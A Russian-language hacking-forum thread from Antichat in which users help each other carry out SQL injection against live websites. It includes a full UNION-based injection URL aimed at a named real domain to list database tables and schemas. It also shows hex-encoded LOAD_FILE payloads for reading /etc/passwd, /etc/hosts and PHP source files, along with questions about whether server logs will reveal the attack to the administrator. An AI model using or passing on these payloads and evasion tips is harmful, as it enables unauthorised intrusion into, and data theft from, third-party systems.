ANTICHAT — форум по информационной безопасности, OSINT и технологиям

есть несколько баз. (5 ветка)
есть офигеть, сколько полей и столбцов.
выбрал одно поле и вывел оттуда все названия столбцов.
А теперь как узнать какое поле к какой БД принадлежит. ?
Возможно это без тупого перебора?))

Используй table_schema.

Взял для примера скуль с соседней темы и добавил туда табл схему:

http://www.ry7.ru/index.php?s=-58+union+select+group_concat(0x0b,TABLE_NAME,0x3a,table_schema)+from+information_schema.tables--

Теперь будет выводится и название БД, к которой эта таблица относится. Так же точно и с колонками.

jecka3000 Без лимита нереально...

тут все поля к одной и той же БД

не могу считывать файлы, подскажите
права вроде есть
root'@'localhost' | FILE | YES

USER() - возвращает что я под root@localhost
VERSION() - 5.0.51a-3ubuntu5.5

кавычки фильтруются по этому кодирую
к примеру
etc/passwd >>> 0x6574632f706173737764

делаю такую вот инъекцию
... where 1=2 union select LOAD_FILE(0x6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
но в результате приходит пустая строка.
файл пытаюсь открыть по пути который мне возвращается в ошибке, типа:
/usr/local/nginx/....../index.php

что я делаю не так?

Вообще то не всегда на /etc/passwd есть права ога?
ВО вторых читай index.php лучше, там доберёшься до конфигов.

1. /etc/passwd
2. выглядит странновато как-то
по
выводит 123123123 ?

ну мне /etc/passwd и не нужен, это я для примера привёл, т.к. путь короткий, хотя тоже ни чего не возвращает
мне нужен именно php файл
в результате ошибки возвращается такой текс
mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ] mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/usr/local/nginx/html/..путь до файла .php



да


и еще вопрос.. ошибки sql куда нибудь логируются? админ потом все тексты ошибочных sql увидит, или только сам факт ошибки

zuzzz:

1. надо указывать не etc/passwd, а /etc/passwd, следовательно твой запрос принимает следующий вид
вряд ли это тебе поможет, так как ты пробовал другие пути (/usr/local/nginx/....../index.php), но на будущее

2. у меня вопрос: зачем ты при запросе с LOAD_FILE используешь limit ..,..?

3. если тебе возвращается пустая строка, то либо у тебя нет прав на чтение, либо такой файл не существует. Попробуй системные файлы такие как: /etc/hosts, /etc/issue, а также другие скрипты твоего сайта, полный путь к которым ты знаешь.

4. насчет логирования sql ошибок не скажу, но если ты юзаешь GET-запросы, то в error.log и access.log будет все видно

mr.celt:

1) спасиб, запомню
2) лимит всегда ставлю, на всякий случай, чтобы по ошибке слишком много данных не получить
он тут не помеха

3) получилось вытащить файл /etc/hosts )
а этот /etc/issue не сумел....
значить права есть

4) запросы post. Это что то меняет?
и как долго данные в error.log и access.log хранятся?